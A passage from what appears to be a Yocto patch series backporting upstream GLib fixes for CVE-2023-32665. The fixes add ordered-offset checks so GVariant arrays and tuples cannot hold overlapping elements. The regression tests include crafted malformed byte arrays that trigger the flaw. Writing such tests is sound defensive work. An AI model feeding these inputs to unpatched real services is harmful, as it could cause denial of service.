60+ * .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
61+ * the frame offsets up to and including the frame
62+ * offset determining the end of element n are in
63+ * order. This guarantees that the bytes of element
64+ * n don't overlap with any previous element.
65+ *
66+ * For trusted data this is set to G_MAXSIZE and we
67+ * don't check that the frame offsets are in order.
68+ *
69+ * Note: This doesn't imply the offsets are good in
70+ * any way apart from their ordering. In particular
71+ * offsets may be out of bounds for this value or
72+ * may imply that the data overlaps the frame
73+ * offsets themselves.
74+ *
75+ * This field is only relevant for arrays of non
76+ * fixed width types.
77+ *
78 * .tree: Only valid when the instance is in tree form.
79 *
80 * Note that accesses from other threads could result in
81@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
82 (gpointer) value->contents.serialised.data,
83 value->size,
84 value->depth,
85+ value->contents.serialised.ordered_offsets_up_to,
86 };
87 return serialised;
88 }
89@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
90 serialised.size = value->size;
91 serialised.data = data;
92 serialised.depth = value->depth;
93+ serialised.ordered_offsets_up_to = 0;
94
95 children = (gpointer *) value->contents.tree.children;
96 n_children = value->contents.tree.n_children;
97@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
98 g_assert (serialised->size == value->size);
99 serialised->depth = value->depth;
100
101+ if (value->state & STATE_SERIALISED)
102+ {
103+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
104+ }
105+ else
106+ {
107+ serialised->ordered_offsets_up_to = 0;
108+ }
109+
110 if (serialised->data)
111 /* g_variant_store() is a public API, so it
112 * it will reacquire the lock if it needs to.
113@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
114 bytes = g_bytes_new_take (data, value->size);
115 value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
116 value->contents.serialised.bytes = bytes;
117+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
118 value->state |= STATE_SERIALISED;
119 }
120 }
121@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
122 serialised.type_info = value->type_info;
123 serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
124 serialised.depth = 0;
125+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
126
127 if (!g_variant_serialised_check (serialised))
128 {
129@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
130 value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
131 }
132
133+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
134+
135 g_clear_pointer (&owned_bytes, g_bytes_unref);
136
137 return value;
138@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
139 child->contents.serialised.bytes =
140 g_bytes_ref (value->contents.serialised.bytes);
141 child->contents.serialised.data = s_child.data;
142+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
143
144 return child;
145 }
146diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
147index c7c2114..fe0b1a4 100644
148--- a/glib/gvariant-serialiser.c
149+++ b/glib/gvariant-serialiser.c
150@@ -1,6 +1,7 @@
151 /*
152 * Copyright © 2007, 2008 Ryan Lortie
153 * Copyright © 2010 Codethink Limited
154+ * Copyright © 2020 William Manley
155 *
156 * This library is free software; you can redistribute it and/or
157 * modify it under the terms of the GNU Lesser General Public
158@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
159 value.type_info = g_variant_type_info_element (value.type_info);
160 g_variant_type_info_ref (value.type_info);
161 value.depth++;
162+ value.ordered_offsets_up_to = 0;
163
164 return value;
165 }
166@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
167 {
168 if (n_children)
169 {
170- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
171+ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
172
173 gvs_filler (&child, children[0]);
174 }
175@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
176 /* proper element size: "Just". recurse to the child. */
177 value.type_info = g_variant_type_info_element (value.type_info);
178 value.depth++;
179+ value.ordered_offsets_up_to = 0;
180
181 return g_variant_serialised_is_normal (value);
182 }
183@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
184 value.data = NULL;
185
186 value.depth++;
187+ value.ordered_offsets_up_to = 0;
188
189 return value;
190 }
191@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
192 {
193 if (n_children)
194 {
195- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
196+ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
197
198 /* write the data for the child. */
199 gvs_filler (&child, children[0]);
200@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
201 value.type_info = g_variant_type_info_element (value.type_info);
202 value.size--;
203 value.depth++;
204+ value.ordered_offsets_up_to = 0;
205
206 return g_variant_serialised_is_normal (value);
207 }
208@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
209 return gvs_variable_sized_array_get_frame_offsets (value).length;
210 }
211
212+/* Find the index of the first out-of-order element in @data, assuming that
213+ * @data is an array of elements of given @type, starting at index @start and
214+ * containing a further @len-@start elements. */
215+#define DEFINE_FIND_UNORDERED(type) \
216+ static gsize \
217+ find_unordered_##type (const guint8 *data, gsize start, gsize len) \
218+ { \
219+ gsize off; \
220+ type current, previous; \
221+ \
222+ memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
223+ for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
224+ { \
225+ memcpy (&current, data + off, sizeof (current)); \
226+ if (current < previous) \
227+ break; \
228+ previous = current; \
229+ } \
230+ return off / sizeof (current) - 1; \
231+ }
232+
233+DEFINE_FIND_UNORDERED (guint8);
234+DEFINE_FIND_UNORDERED (guint16);
235+DEFINE_FIND_UNORDERED (guint32);
236+DEFINE_FIND_UNORDERED (guint64);
237+
238 static GVariantSerialised
239 gvs_variable_sized_array_get_child (GVariantSerialised value,
240 gsize index_)
241@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
242 g_variant_type_info_ref (child.type_info);
243 child.depth = value.depth + 1;
244
245+ /* If the requested @index_ is beyond the set of indices whose framing offsets
246+ * have been checked, check the remaining offsets to see whether they’re
247+ * normal (in order, no overlapping array elements). */
248+ if (index_ > value.ordered_offsets_up_to)
249+ {
250+ switch (offsets.offset_size)
251+ {
252+ case 1:
253+ {
254+ value.ordered_offsets_up_to = find_unordered_guint8 (
255+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
256+ break;
257+ }
258+ case 2:
259+ {
260+ value.ordered_offsets_up_to = find_unordered_guint16 (
261+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
262+ break;
263+ }
264+ case 4:
265+ {
266+ value.ordered_offsets_up_to = find_unordered_guint32 (
267+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
268+ break;
269+ }
270+ case 8:
271+ {
272+ value.ordered_offsets_up_to = find_unordered_guint64 (
273+ offsets.array, value.ordered_offsets_up_to, index_ + 1);
274+ break;
275+ }
276+ default:
277+ /* gvs_get_offset_size() only returns maximum 8 */
278+ g_assert_not_reached ();
279+ }
280+ }
281+
282+ if (index_ > value.ordered_offsets_up_to)
283+ {
284+ /* Offsets are invalid somewhere, so return an empty child. */
285+ return child;
286+ }
287+
288 if (index_ > 0)
289 {
290 guint alignment;
291@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
292
293 g_assert (offset == offsets.data_size);
294
295+ /* All offsets have now been checked. */
296+ value.ordered_offsets_up_to = G_MAXSIZE;
297+
298 return TRUE;
299 }
300
301@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
302 for (i = 0; i < length; i++)
303 {
304 const GVariantMemberInfo *member_info;
305- GVariantSerialised child;
306+ GVariantSerialised child = { 0, };
307 gsize fixed_size;
308 guint alignment;
309 gsize end;
310@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
311 offset = end;
312 }
313
314+ /* All element bounds have been checked above. */
315+ value.ordered_offsets_up_to = G_MAXSIZE;
316+
317 {
318 gsize fixed_size;
319 guint alignment;
320diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
321index 81343e9..99d18ef 100644
322--- a/glib/gvariant-serialiser.h
323+++ b/glib/gvariant-serialiser.h
324@@ -29,6 +29,14 @@ typedef struct
325 guchar *data;
326 gsize size;
327 gsize depth; /* same semantics as GVariant.depth */
328+ /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
329+ * including the frame offset determining the end of element n are in order.
330+ * This guarantees that the bytes of element n don't overlap with any previous
331+ * element.
332+ *
333+ * This is both read and set by g_variant_serialised_get_child for arrays of
334+ * non-fixed-width types */
335+ gsize ordered_offsets_up_to;
336 } GVariantSerialised;
337
338 /* deserialisation */
339diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
340index 0e5ec8e..967e9a1 100644
341--- a/glib/tests/gvariant.c
342+++ b/glib/tests/gvariant.c
343@@ -1,5 +1,6 @@
344 /*
345 * Copyright © 2010 Codethink Limited
346+ * Copyright © 2020 William Manley
347 *
348 * This library is free software; you can redistribute it and/or
349 * modify it under the terms of the GNU Lesser General Public
350@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
351 serialised->size = instance->size;
352
353 serialised->depth = 0;
354+ serialised->ordered_offsets_up_to = 0;
355
356 g_assert_true (serialised->type_info == instance->type_info);
357 g_assert_cmpuint (serialised->size, ==, instance->size);
358@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
359 g_variant_unref (variant);
360 }
361
362+/* This is a regression test that we can't have non-normal values that take up
363+ * significantly more space than the normal equivalent, by specifying the
364+ * offset table entries so that array elements overlap.
365+ *
366+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
367+static void
368+test_normal_checking_array_offsets2 (void)
369+{
370+ const guint8 data[] = {
371+ 'h', 'i', '\0',
372+ 0x03, 0x00, 0x03,
373+ 0x06, 0x00, 0x06,
374+ 0x09, 0x00, 0x09,
375+ 0x0c, 0x00, 0x0c,
376+ 0x0f, 0x00, 0x0f,
377+ 0x12, 0x00, 0x12,
378+ 0x15, 0x00, 0x15,
379+ };
380+ gsize size = sizeof (data);
381+ const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
382+ GVariant *variant = NULL;
383+ GVariant *normal_variant = NULL;
384+ GVariant *expected = NULL;
385+
386+ variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
387+ g_assert_nonnull (variant);
388+
389+ normal_variant = g_variant_get_normal_form (variant);
390+ g_assert_nonnull (normal_variant);
391+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
392+
393+ expected = g_variant_new_parsed (
394+ "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
395+ g_assert_cmpvariant (expected, variant);
396+ g_assert_cmpvariant (expected, normal_variant);
397+
398+ g_variant_unref (expected);
399+ g_variant_unref (normal_variant);
400+ g_variant_unref (variant);
401+}
402+
403 /* Test that a tuple with invalidly large values in its offset table is
404 * normalised successfully without looping infinitely. */
405 static void
406@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
407 test_normal_checking_tuples);
408 g_test_add_func ("/gvariant/normal-checking/array-offsets",
409 test_normal_checking_array_offsets);
410+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
411+ test_normal_checking_array_offsets2);
412 g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
413 test_normal_checking_tuple_offsets);
414 g_test_add_func ("/gvariant/normal-checking/empty-object-path",
415--
4162.24.4
417
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
1From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Fri, 11 Aug 2023 04:09:12 +0000
4Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
5 member
6
7This introduces no functional changes.
8
9Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
18 1 file changed, 46 insertions(+), 27 deletions(-)
19
20diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
21index fe0b1a4..6f9b366 100644
22--- a/glib/gvariant-serialiser.c
23+++ b/glib/gvariant-serialiser.c
24@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
25 * for the tuple. See the notes in gvarianttypeinfo.h.
26 */
27
28+static void
29+gvs_tuple_get_member_bounds (GVariantSerialised value,
30+ gsize index_,
31+ gsize offset_size,
32+ gsize *out_member_start,
33+ gsize *out_member_end)
34+{
35+ const GVariantMemberInfo *member_info;
36+ gsize member_start, member_end;
37+
38+ member_info = g_variant_type_info_member_info (value.type_info, index_);
39+
40+ if (member_info->i + 1)
41+ member_start = gvs_read_unaligned_le (value.data + value.size -
42+ offset_size * (member_info->i + 1),
43+ offset_size);
44+ else
45+ member_start = 0;
46+
47+ member_start += member_info->a;
48+ member_start &= member_info->b;
49+ member_start |= member_info->c;
50+
51+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
52+ member_end = value.size - offset_size * (member_info->i + 1);
53+
54+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
55+ {
56+ gsize fixed_size;
57+
58+ g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
59+ member_end = member_start + fixed_size;
60+ }
61+
62+ else /* G_VARIANT_MEMBER_ENDING_OFFSET */
63+ member_end = gvs_read_unaligned_le (value.data + value.size -
64+ offset_size * (member_info->i + 2),
65+ offset_size);
66+
67+ if (out_member_start != NULL)
68+ *out_member_start = member_start;
69+ if (out_member_end != NULL)
70+ *out_member_end = member_end;
71+}
72+
73 static gsize
74 gvs_tuple_n_children (GVariantSerialised value)
75 {
76@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
77 }
78 }
79
80- if (member_info->i + 1)
81- start = gvs_read_unaligned_le (value.data + value.size -
82- offset_size * (member_info->i + 1),
83- offset_size);
84- else
85- start = 0;
86-
87- start += member_info->a;
88- start &= member_info->b;
89- start |= member_info->c;
90-
91- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
92- end = value.size - offset_size * (member_info->i + 1);
93-
94- else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
95- {
96- gsize fixed_size;
97-
98- g_variant_type_info_query (child.type_info, NULL, &fixed_size);
99- end = start + fixed_size;
100- child.size = fixed_size;
101- }
102-
103- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
104- end = gvs_read_unaligned_le (value.data + value.size -
105- offset_size * (member_info->i + 2),
106- offset_size);
107+ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
108
109 /* The child should not extend into the offset table. */
110 if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
111--
1122.24.4
113
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
1From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Fri, 11 Aug 2023 04:13:02 +0000
4Subject: [PATCH] gvariant-serialiser: Rework child size calculation
5
6This reduces a few duplicate calls to `g_variant_type_info_query()` and
7explains why they’re needed.
8
9Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
10
11Helps: #2121
12
13CVE: CVE-2023-32665
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 glib/gvariant-serialiser.c | 31 +++++++++----------------------
18 1 file changed, 9 insertions(+), 22 deletions(-)
19
20diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
21index 6f9b366..fb75923 100644
22--- a/glib/gvariant-serialiser.c
23+++ b/glib/gvariant-serialiser.c
24@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
25 child.depth = value.depth + 1;
26 offset_size = gvs_get_offset_size (value.size);
27
28+ /* Ensure the size is set for fixed-sized children, or
29+ * g_variant_serialised_check() will fail, even if we return
30+ * (child.data == NULL) to indicate an error. */
31+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
32+ g_variant_type_info_query (child.type_info, NULL, &child.size);
33+
34 /* tuples are the only (potentially) fixed-sized containers, so the
35 * only ones that have to deal with the possibility of having %NULL
36 * data with a non-zero %size if errors occurred elsewhere.
37 */
38 if G_UNLIKELY (value.data == NULL && value.size != 0)
39 {
40- g_variant_type_info_query (child.type_info, NULL, &child.size);
41-
42 /* this can only happen in fixed-sized tuples,
43 * so the child must also be fixed sized.
44 */
45@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
46 else
47 {
48 if (offset_size * (member_info->i + 1) > value.size)
49- {
50- /* if the child is fixed size, return its size.
51- * if child is not fixed-sized, return size = 0.
52- */
53- g_variant_type_info_query (child.type_info, NULL, &child.size);
54-
55- return child;
56- }
57+ return child;
58 }
59
60- gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
61-
62 /* The child should not extend into the offset table. */
63- if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
64- {
65- GVariantSerialised last_child;
66- last_child = gvs_tuple_get_child (value,
67- g_variant_type_info_n_members (value.type_info) - 1);
68- last_end = last_child.data + last_child.size - value.data;
69- g_variant_type_info_unref (last_child.type_info);
70- }
71- else
72- last_end = end;
73+ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
74+ gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
75
76 if (start < end && end <= value.size && end <= last_end)
77 {
78--
792.24.4
80
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
1From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
2From: Philip Withnall <pwithnall@endlessos.org>
3Date: Wed, 16 Aug 2023 12:09:06 +0000
4Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
5 each other
6
7This is similar to the earlier commit which prevents child elements of a
8variable-sized array from overlapping each other, but this time for
9tuples. It is based heavily on ideas by William Manley.
10
11Tuples are slightly different from variable-sized arrays in that they
12contain a mixture of fixed and variable sized elements. All but one of
13the variable sized elements have an entry in the frame offsets table.
14This means that if we were to just check the ordering of the frame
15offsets table, the variable sized elements could still overlap
16interleaving fixed sized elements, which would be bad.
17
18Therefore we have to check the elements rather than the frame offsets.
19
20The logic of checking the elements up to the index currently being
21requested, and caching the result in `ordered_offsets_up_to`, means that
22the algorithmic cost implications are the same for this commit as for
23variable-sized arrays: an O(N) cost for these checks is amortised out
24over N accesses to O(1) per access.
25
26Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
27
28Fixes: #2121
29
30CVE: CVE-2023-32665
31Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
32Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
33---
34 glib/gvariant-core.c | 6 +-
35 glib/gvariant-serialiser.c | 40 ++++++++
36 glib/gvariant-serialiser.h | 7 +-
37 glib/gvariant.c | 1 +
38 glib/tests/gvariant.c | 181 +++++++++++++++++++++++++++++++++++++
39 5 files changed, 232 insertions(+), 3 deletions(-)
40
41diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
42index 9b51e15..b951cd9 100644
43--- a/glib/gvariant-core.c
44+++ b/glib/gvariant-core.c
45@@ -1,6 +1,7 @@
46 /*
47 * Copyright © 2007, 2008 Ryan Lortie
48 * Copyright © 2010 Codethink Limited
49+ * Copyright © 2022 Endless OS Foundation, LLC
50 *
51 * This library is free software; you can redistribute it and/or
52 * modify it under the terms of the GNU Lesser General Public
53@@ -179,7 +180,7 @@ struct _GVariant
54 * offsets themselves.
55 *
56 * This field is only relevant for arrays of non
57- * fixed width types.
58+ * fixed width types and for tuples.
59 *
60 * .tree: Only valid when the instance is in tree form.
61 *
62@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
63 */
64 s_child = g_variant_serialised_get_child (serialised, index_);
65
66+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
67+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
68+
69 /* Check whether this would cause nesting too deep. If so, return a fake
70 * child. The only situation we expect this to happen in is with a variant,
71 * as all other deeply-nested types have a static type, and hence should
72diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
73index fb75923..cd4a3e6 100644
74--- a/glib/gvariant-serialiser.c
75+++ b/glib/gvariant-serialiser.c
76@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
77 * for the tuple. See the notes in gvarianttypeinfo.h.
78 */
79
80+/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
81+ * condition may not hold true for invalid serialised variants. The caller is
82+ * responsible for checking the returned values and handling invalid ones
83+ * appropriately. */
84 static void
85 gvs_tuple_get_member_bounds (GVariantSerialised value,
86 gsize index_,
87@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
88 return child;
89 }
90
91+ /* If the requested @index_ is beyond the set of indices whose framing offsets
92+ * have been checked, check the remaining offsets to see whether they’re
93+ * normal (in order, no overlapping tuple elements).
94+ *
95+ * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
96+ * all the tuple *elements* here, not just all the framing offsets, since
97+ * tuples contain a mix of elements which use framing offsets and ones which
98+ * don’t. None of them are allowed to overlap. */
99+ if (index_ > value.ordered_offsets_up_to)
100+ {
101+ gsize i, prev_i_end = 0;
102+
103+ if (value.ordered_offsets_up_to > 0)
104+ gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
105+
106+ for (i = value.ordered_offsets_up_to; i <= index_; i++)
107+ {
108+ gsize i_start, i_end;
109+
110+ gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
111+
112+ if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
113+ break;
114+
115+ prev_i_end = i_end;
116+ }
117+
118+ value.ordered_offsets_up_to = i - 1;
119+ }
120+
121+ if (index_ > value.ordered_offsets_up_to)
122+ {
123+ /* Offsets are invalid somewhere, so return an empty child. */
124+ return child;
125+ }
126+
127 if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
128 {
129 if (offset_size * (member_info->i + 2) > value.size)
130diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
131index 99d18ef..144aec8 100644
132--- a/glib/gvariant-serialiser.h
133+++ b/glib/gvariant-serialiser.h
134@@ -34,8 +34,11 @@ typedef struct
135 * This guarantees that the bytes of element n don't overlap with any previous
136 * element.
137 *
138- * This is both read and set by g_variant_serialised_get_child for arrays of
139- * non-fixed-width types */
140+ * This is both read and set by g_variant_serialised_get_child() for arrays of
141+ * non-fixed-width types, and for tuples.
142+ *
143+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
144+ * rather than an index into the frame offsets. */
145 gsize ordered_offsets_up_to;
146 } GVariantSerialised;
147
148diff --git a/glib/gvariant.c b/glib/gvariant.c
149index d6f68a9..cdb428e 100644
150--- a/glib/gvariant.c
151+++ b/glib/gvariant.c
152@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
153 serialised.type_info = g_variant_get_type_info (trusted);
154 serialised.size = g_variant_get_size (trusted);
155 serialised.data = g_malloc (serialised.size);
156+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
157 g_variant_store (trusted, serialised.data);
158 g_variant_unref (trusted);
159
160diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
161index 967e9a1..a84b02e 100644
162--- a/glib/tests/gvariant.c
163+++ b/glib/tests/gvariant.c
164@@ -1,6 +1,7 @@
165 /*
166 * Copyright © 2010 Codethink Limited
167 * Copyright © 2020 William Manley
168+ * Copyright © 2022 Endless OS Foundation, LLC
169 *
170 * This library is free software; you can redistribute it and/or
171 * modify it under the terms of the GNU Lesser General Public
172@@ -1451,6 +1452,7 @@ test_maybe (void)
173 serialised.data = flavoured_malloc (needed_size, flavour);
174 serialised.size = needed_size;
175 serialised.depth = 0;
176+ serialised.ordered_offsets_up_to = 0;
177
178 g_variant_serialiser_serialise (serialised,
179 random_instance_filler,
180@@ -1574,6 +1576,7 @@ test_array (void)
181 serialised.data = flavoured_malloc (needed_size, flavour);
182 serialised.size = needed_size;
183 serialised.depth = 0;
184+ serialised.ordered_offsets_up_to = 0;
185
186 g_variant_serialiser_serialise (serialised, random_instance_filler,
187 (gpointer *) instances, n_children);
188@@ -1738,6 +1741,7 @@ test_tuple (void)
189 serialised.data = flavoured_malloc (needed_size, flavour);
190 serialised.size = needed_size;
191 serialised.depth = 0;
192+ serialised.ordered_offsets_up_to = 0;
193
194 g_variant_serialiser_serialise (serialised, random_instance_filler,
195 (gpointer *) instances, n_children);
196@@ -1834,6 +1838,7 @@ test_variant (void)
197 serialised.data = flavoured_malloc (needed_size, flavour);
198 serialised.size = needed_size;
199 serialised.depth = 0;
200+ serialised.ordered_offsets_up_to = 0;
201
202 g_variant_serialiser_serialise (serialised, random_instance_filler,
203 (gpointer *) &instance, 1);
204@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
205 g_variant_unref (variant);
206 }
207
208+/* This is a regression test that we can't have non-normal values that take up
209+ * significantly more space than the normal equivalent, by specifying the
210+ * offset table entries so that tuple elements overlap.
211+ *
212+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
213+ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
214+static void
215+test_normal_checking_tuple_offsets2 (void)
216+{
217+ const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
218+ const guint8 data[] = {
219+ 0x12, 0x34, 0x56, 0x78, 0x01,
220+ /*
221+ ^───────────────────┘
222+
223+ ^^^^^^^^^^ 1st yy
224+ ^^^^^^^^^^ 2nd yy
225+ ^^^^^^^^^^ 3rd yy
226+ ^^^^ Framing offsets
227+ */
228+
229+ /* If this variant was encoded normally, it would be something like this:
230+ * 0x12, 0x34, pad, pad, [array bytes], 0x56, 0x78, pad, pad, [array bytes], 0x9A, 0xBC, 0xXX
231+ * ^─────────────────────────────────────────────────────┘
232+ *
233+ * ^^^^^^^^^^ 1st yy
234+ * ^^^^^^^^^^ 2nd yy
235+ * ^^^^^^^^^^ 3rd yy
236+ * ^^^^ Framing offsets
237+ */
238+ };
239+ gsize size = sizeof (data);
240+ GVariant *variant = NULL;
241+ GVariant *normal_variant = NULL;
242+ GVariant *expected = NULL;
243+
244+ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
245+ g_assert_nonnull (variant);
246+
247+ normal_variant = g_variant_get_normal_form (variant);
248+ g_assert_nonnull (normal_variant);
249+ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
250+
251+ expected = g_variant_new_parsed (
252+ "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
253+ g_assert_cmpvariant (expected, variant);
254+ g_assert_cmpvariant (expected, normal_variant);
255+
256+ g_variant_unref (expected);
257+ g_variant_unref (normal_variant);
258+ g_variant_unref (variant);
259+}
260+
261+/* This is a regression test that overlapping entries in the offset table are
262+ * decoded consistently, even though they’re non-normal.
263+ *
264+ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
265+static void
266+test_normal_checking_tuple_offsets3 (void)
267+{
268+ /* The expected decoding of this non-normal byte stream is complex. See
269+ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
270+ * specification.
271+ *
272+ * The rule “Child Values Overlapping Framing Offsets” from the specification
273+ * says that the first `ay` must be decoded as `[0x01]` even though it
274+ * overlaps the first byte of the offset table. However, since commit
275+ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
276+ * this as it’s exploitable. So the first `ay` must be given a default value.
277+ *
